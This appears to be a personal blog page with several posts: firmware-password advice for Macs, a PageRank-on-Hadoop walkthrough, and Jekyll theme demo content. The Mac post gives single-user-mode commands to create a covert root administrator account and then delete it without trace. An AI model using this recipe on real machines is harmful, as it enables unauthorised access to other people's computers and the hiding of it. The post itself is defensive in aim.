How to hack a Mac

tl;dr The most important thing to set on any Mac.

Do you use a Mac? Do you have an open firmware password set? If not, reboot your machine and hold down Command-R to enter recovery mode. From there, select Utilities from the menu bar, then click Firmware Password to set a password. Make sure you remember it. If you ever forget it, you can take your machine to an Apple Store, where they will do some funky process and call the mothership, then reset your password. There used to be an exploit where you could reboot without one of the RAM sticks and it would reset the password, but that was patched a few years ago. Besides, most machines come with RAM soldered to the motherboard these days, so it is kind of a moot point.

The open firmware password is set at the hardware level, and requires the user to enter a password in order to boot any other operating system (or mode). I have this set on my Mac, so if my machine were ever stolen, it would effectively be a brick. Since the SSD is technically removable (although non-standard) in my 15-inch Retina MBP, a thief could theoretically remove the SSD and replace it with a blank one from Other World Computing. Unfortunately for them, it would be impossible to install a new OS on that drive without my firmware password, which would be very difficult to crack, considering you cannot simply grab a hash and run John the Ripper against it.

Just for fun, I decided to see just how easy it would be to break into my own machine if I forgot the password. If you want to just reset the password, you can open a terminal in recovery mode, and type resetpassword to reset it. But I was more interested in how to break in without the owner knowing. If you changed the password, then it would be pretty obvious what you did. Here is what I did:

First, I rebooted into single user mode by restarting the machine and holding down command-s.

Once booted, mount the filesystem:

$ mount -uw /

Simply delete the .AppleSetupDone file. The next time the machine boots, it will prompt you to create a new administrator account, which conveniently will have root privileges.

$ rm /var/db/.AppleSetupDone

Finally, reboot the machine.

$ reboot

At this point, you can go ahead and create a new user account, which will have full root access. If you want to delete it without leaving a trace, reboot back into single user mode, then mount the filesystem:

$ mount -uw /

Then delete the user folder and a few other files:

$ rm /var/db/dslocal/nodes/Default/users/{username}.plist
$ rm -rf /Users/{username}

Finally, reboot the machine.

$ reboot

Please only do this on machines that you own, and make sure to set an open firmware password. You could also use FileVault instead of, or in addition to, a firmware password, but FileVault alone will not prevent someone from removing the SSD and installing another OS.


Want to see something else added? Open an issue.

Computing PageRank of a Large Graph on Hadoop

tl;dr Let's use a lot of computers to do some math.

For the WSDM Cup Challenge, we wanted to compute the PageRank of a citation graph. In this case, the graph provided by Microsoft Research was a directed graph with 73,543,432 vertices and 757,462,733 edges. To do this efficiently, we are going to spin up an HDInsight cluster on Microsoft Azure. I chose 5 D3 nodes, but this configuration can get pretty pricey. Once the cluster is deployed, ssh into the head node using the account you specified during cluster creation. Then let's get going:

I recommend doing all of this within a screen (or tmux) session.

$ screen

First download the graph with wget:

$ wget https://academicgraph.blob.core.windows.net/graph-2015-08-20/PaperReferences.zip

Then unzip it. The stock unzip won't work on this file (trust me), so install p7zip first and use it to extract the archive.

$ sudo apt-get install p7zip-full
$ 7za x PaperReferences.zip

Now we hit the first roadblock. The graph package we will be using requires an edge file with node IDs as integers, but the file we are given has strings. Never fear, let's just whip up some Python to fix it.

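# Map each string paper ID to a dense integer ID, in order of first appearance.
ids = {}
with open('PaperReferences.txt', 'r') as f, open('output.edges', 'w') as out:
    for l in f:
        # Strip the line ending before splitting. Otherwise the second column
        # keeps its newline, and the same paper gets two different integers
        # depending on which column it appears in.
        a, b = l.rstrip('\r\n').split('\t')
        # setdefault returns the existing ID, or assigns the next free one.
        a = ids.setdefault(a, len(ids))
        b = ids.setdefault(b, len(ids))
        out.write("{0}\t{1}\n".format(a, b))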
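
To sanity-check the remapping before running it on the full file, the same idea can be tried on a few lines in memory. This is only a sketch: the function name remap_edges and the sample IDs are made up for illustration and are not part of the dataset or of any library.

```python
def remap_edges(lines):
    """Map string node IDs to dense integers in order of first appearance.

    Returns the list of integer edges and the string -> integer mapping.
    """
    ids = {}
    edges = []
    for line in lines:
        line = line.rstrip("\r\n")
        if not line:
            continue  # skip blank lines
        src, dst = line.split("\t")
        # setdefault returns the existing ID or assigns the next free one.
        src_id = ids.setdefault(src, len(ids))
        dst_id = ids.setdefault(dst, len(ids))
        edges.append((src_id, dst_id))
    return edges, ids


# Hypothetical sample lines in the same tab-separated layout as the edge file.
sample = ["7F3A\t01BC\n", "01BC\t9E20\n", "7F3A\t9E20\n"]
edges, ids = remap_edges(sample)
print(edges)
print(len(ids))
```

Every distinct string should end up with exactly one integer, no matter which column it appears in.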

Now that we have our edge file in the correct format, let's put it in HDFS:

$ hdfs dfs -mkdir [username]
$ hdfs dfs -mkdir pagerank
$ hdfs dfs -put output.edges pagerank/

One last thing - we need to know how many vertices are in the edge file:

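# Find the largest node ID that appears anywhere in the edge file.
m = 0
with open('output.edges') as f:
    for l in f:
        a, b = l.split('\t')
        m = max(m, int(a), int(b))
# print() with a single argument works in both Python 2 and Python 3.
print(m)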

Finally, now that the edge file is in HDFS, we can run PEGASUS. The first argument is the number of nodes in the graph (make sure to add one to the output of the max-ID script above, since IDs start at zero), and the second argument is the number of reducers. The general recommendation is to use 2*n reducers, where n is the number of worker nodes.
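
As a quick worked example of those two numbers, here is a small sketch. The helper name pegasus_args is hypothetical, and the maximum ID of 73543431 is inferred from the vertex count quoted earlier, not taken from an actual run.

```python
def pegasus_args(max_node_id, worker_nodes):
    """Derive the first two run_pr.sh arguments from the rules described above."""
    num_nodes = max_node_id + 1      # IDs start at 0, so the count is max + 1
    num_reducers = 2 * worker_nodes  # rule of thumb: 2 reducers per worker node
    return num_nodes, num_reducers


# Assumed inputs: max ID 73543431 and 5 worker nodes.
print(pegasus_args(73543431, 5))
```

With those assumed inputs, the result matches the 73543432 and 10 passed to run_pr.sh in this post.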

$ wget http://www.cs.cmu.edu/~pegasus/PEGASUSH-2.0.tar.gz
$ tar -xvzf PEGASUSH-2.0.tar.gz
$ cd PEGASUS/
$ ./run_pr.sh 73543432 10 pagerank nosym

If all goes well, the Hadoop job will be submitted and you will be able to monitor the progress of the map and reduce phases of the job with output like:

15/11/08 22:55:57 INFO mapreduce.Job:  map 87% reduce 14%
15/11/08 22:55:59 INFO mapreduce.Job:  map 88% reduce 15%
15/11/08 22:56:05 INFO mapreduce.Job:  map 88% reduce 16%
15/11/08 22:56:08 INFO mapreduce.Job:  map 89% reduce 16%
15/11/08 22:56:18 INFO mapreduce.Job:  map 90% reduce 16%
15/11/08 22:56:25 INFO mapreduce.Job:  map 90% reduce 17%

When it finishes, you should see output like:

[PEGASUS] PageRank computed.
[PEGASUS] The final PageRanks are in the HDFS pr_vector.
[PEGASUS] The minium and maximum PageRanks are in the HDFS pr_minmax.
[PEGASUS] The histogram of PageRanks in 1000 bins between min_PageRank and max_PageRank are in the HDFS pr_distr.

Finally, you can get the files off of HDFS:

$ hdfs dfs -copyToLocal pr_vector/part-0000

The format of the output files is:

(nodeid TAB "v"PageRank_of_the_node)
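
Assuming each line really is the node ID, a tab, and then the letter v followed by the score, a few lines of Python are enough to read the results back and pull out the highest-ranked nodes. The function names and the sample values below are made up for illustration.

```python
def parse_pr_line(line):
    """Parse one 'nodeid<TAB>v<PageRank>' line into (int node_id, float rank)."""
    node_id, value = line.rstrip("\r\n").split("\t")
    if not value.startswith("v"):
        raise ValueError("unexpected value field: %r" % value)
    return int(node_id), float(value[1:])


def top_k(lines, k):
    """Return the k (node_id, rank) pairs with the highest PageRank."""
    ranks = [parse_pr_line(line) for line in lines if line.strip()]
    return sorted(ranks, key=lambda pair: pair[1], reverse=True)[:k]


# Hypothetical sample lines, not real output from the job.
sample = ["0\tv0.25\n", "1\tv0.5\n", "2\tv0.125\n"]
print(top_k(sample, 2))
```

For the real output you would pass an open file object instead of the sample list. Sorting all 73 million entries in memory may be too much for a small machine, in which case a heap of size k (heapq.nlargest) is the usual alternative.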

Hopefully this post, while a bit long, demonstrated the power of the MapReduce programming paradigm as well as how to work with large graphs. Once you're finished with the HDInsight cluster, make sure to turn it off or else you may rack up a nasty bill.
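
To make the MapReduce angle a little more concrete, here is a toy, single-machine sketch of how one PageRank iteration splits into a map step and a reduce step. This is not how PEGASUS implements it internally. The damping factor of 0.85 and the iteration count are conventional values assumed here, and nodes with no outgoing edges are simply ignored.

```python
from collections import defaultdict


def pagerank_iteration(edges, ranks, damping=0.85):
    """One PageRank step over integer node IDs 0..n-1, written map/reduce style."""
    n = len(ranks)
    out_degree = defaultdict(int)
    for src, _ in edges:
        out_degree[src] += 1

    # "Map": every edge emits (destination, share of the source's rank).
    emitted = [(dst, ranks[src] / out_degree[src]) for src, dst in edges]

    # "Reduce": sum the shares that arrive at each destination.
    sums = defaultdict(float)
    for dst, share in emitted:
        sums[dst] += share

    # Mix in the random-jump term. Rank held by nodes without out-links is
    # dropped in this sketch, so totals can fall below 1 on such graphs.
    return [(1 - damping) / n + damping * sums[v] for v in range(n)]


def pagerank(edges, n, iterations=50, damping=0.85):
    """Run a fixed number of iterations from a uniform starting vector."""
    ranks = [1.0 / n] * n
    for _ in range(iterations):
        ranks = pagerank_iteration(edges, ranks, damping)
    return ranks


# Tiny example graph: nodes 0 and 1 both cite 2, and 2 cites 0.
print(pagerank([(0, 2), (1, 2), (2, 0)], 3))
```

On a cluster, the map and reduce steps run in parallel over partitions of the edge file, which is what makes a graph with hundreds of millions of edges tractable.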


Introducing Hyde

Hyde is a brazen two-column Jekyll theme that pairs a prominent sidebar with uncomplicated content. It's based on Poole, the Jekyll butler.

Built on Poole

Poole is the Jekyll Butler, serving as an upstanding and effective foundation for Jekyll themes by @mdo. Poole, and every theme built on it (like Hyde here) includes the following:

  • Complete Jekyll setup included (layouts, config, 404, RSS feed, posts, and example page)
  • Mobile friendly design and development
  • Easily scalable text and component sizing with rem units in the CSS
  • Support for a wide gamut of HTML elements
  • Related posts (time-based, because Jekyll) below each post
  • Syntax highlighting, courtesy Pygments (the Python-based code snippet highlighter)

Hyde features

In addition to the features of Poole, Hyde adds the following:

  • Sidebar includes support for textual modules and a dynamically generated navigation with active link support
  • Two orientations for content and sidebar, default (left sidebar) and reverse (right sidebar), available via <body> classes
  • Eight optional color schemes, available via <body> classes

Head to the readme to learn more.

Browser support

Hyde is by preference a forward-thinking project. In addition to the latest versions of Chrome, Safari (mobile and desktop), and Firefox, it is only compatible with Internet Explorer 9 and above.

Download

Hyde is developed on and hosted with GitHub. Head to the GitHub repository for downloads, bug reports, and feature requests.

Thanks!

Example content

Howdy! This is an example blog post that shows several types of HTML content supported in this theme.

Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Aenean eu leo quam. Pellentesque ornare sem lacinia quam venenatis vestibulum. Sed posuere consectetur est at lobortis. Cras mattis consectetur purus sit amet fermentum.

Curabitur blandit tempus porttitor. Nullam quis risus eget urna mollis ornare vel eu leo. Nullam id dolor id nibh ultricies vehicula ut id elit.

Etiam porta sem malesuada magna mollis euismod. Cras mattis consectetur purus sit amet fermentum. Aenean lacinia bibendum nulla sed consectetur.

Inline HTML elements

HTML defines a long list of available inline tags, a complete list of which can be found on the Mozilla Developer Network.

  • To bold text, use <strong>.
  • To italicize text, use <em>.
  • Abbreviations, like HTML, should use <abbr>, with an optional title attribute for the full phrase.
  • Citations, like — Mark Otto, should use <cite>.
  • Deleted text should use <del> and inserted text should use <ins>.
  • Superscript text uses <sup> and subscript text uses <sub>.

Most of these elements are styled by browsers with few modifications on our part.

Heading

Vivamus sagittis lacus vel augue rutrum faucibus dolor auctor. Duis mollis, est non commodo luctus, nisi erat porttitor ligula, eget lacinia odio sem nec elit. Morbi leo risus, porta ac consectetur ac, vestibulum at eros.

Code

Cum sociis natoque penatibus et magnis dis code element montes, nascetur ridiculus mus.

// Example can be run directly in your JavaScript console

// Create a function that takes two arguments and returns the sum of those arguments
var adder = new Function("a", "b", "return a + b");

// Call the function
adder(2, 6);
// > 8

Aenean lacinia bibendum nulla sed consectetur. Etiam porta sem malesuada magna mollis euismod. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa.

Gists via GitHub Pages

Vestibulum id ligula porta felis euismod semper. Nullam quis risus eget urna mollis ornare vel eu leo. Donec sed odio dui.

Aenean eu leo quam. Pellentesque ornare sem lacinia quam venenatis vestibulum. Nullam quis risus eget urna mollis ornare vel eu leo. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Donec sed odio dui. Vestibulum id ligula porta felis euismod semper.

Lists

Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Aenean lacinia bibendum nulla sed consectetur. Etiam porta sem malesuada magna mollis euismod. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus.

  • Praesent commodo cursus magna, vel scelerisque nisl consectetur et.
  • Donec id elit non mi porta gravida at eget metus.
  • Nulla vitae elit libero, a pharetra augue.

Donec ullamcorper nulla non metus auctor fringilla. Nulla vitae elit libero, a pharetra augue.

  1. Vestibulum id ligula porta felis euismod semper.
  2. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.
  3. Maecenas sed diam eget risus varius blandit sit amet non magna.

Cras mattis consectetur purus sit amet fermentum. Sed posuere consectetur est at lobortis.

HyperText Markup Language (HTML)
The language used to describe and define the content of a Web page
Cascading Style Sheets (CSS)
Used to describe the appearance of Web content
JavaScript (JS)
The programming language used to build advanced Web sites and applications

Integer posuere erat a ante venenatis dapibus posuere velit aliquet. Morbi leo risus, porta ac consectetur ac, vestibulum at eros. Nullam quis risus eget urna mollis ornare vel eu leo.

Images

Quisque consequat sapien eget quam rhoncus, sit amet laoreet diam tempus. Aliquam aliquam metus erat, a pulvinar turpis suscipit at.

placeholder placeholder placeholder

Tables

Aenean lacinia bibendum nulla sed consectetur. Lorem ipsum dolor sit amet, consectetur adipiscing elit.

Name      Upvotes   Downvotes
Alice     10        11
Bob       4         3
Charlie   7         9
Totals    21        23

Nullam id dolor id nibh ultricies vehicula ut id elit. Sed posuere consectetur est at lobortis. Nullam quis risus eget urna mollis ornare vel eu leo.



What's Jekyll?

Jekyll is a static site generator, an open-source tool for creating simple yet powerful websites of all shapes and sizes. From the project's readme:

Jekyll is a simple, blog aware, static site generator. It takes a template directory [...] and spits out a complete, static website suitable for serving with Apache or your favorite web server. This is also the engine behind GitHub Pages, which you can use to host your project’s page or blog right here from GitHub.

It's an immensely useful tool and one we encourage you to use here with Hyde.

Find out more by visiting the project on GitHub.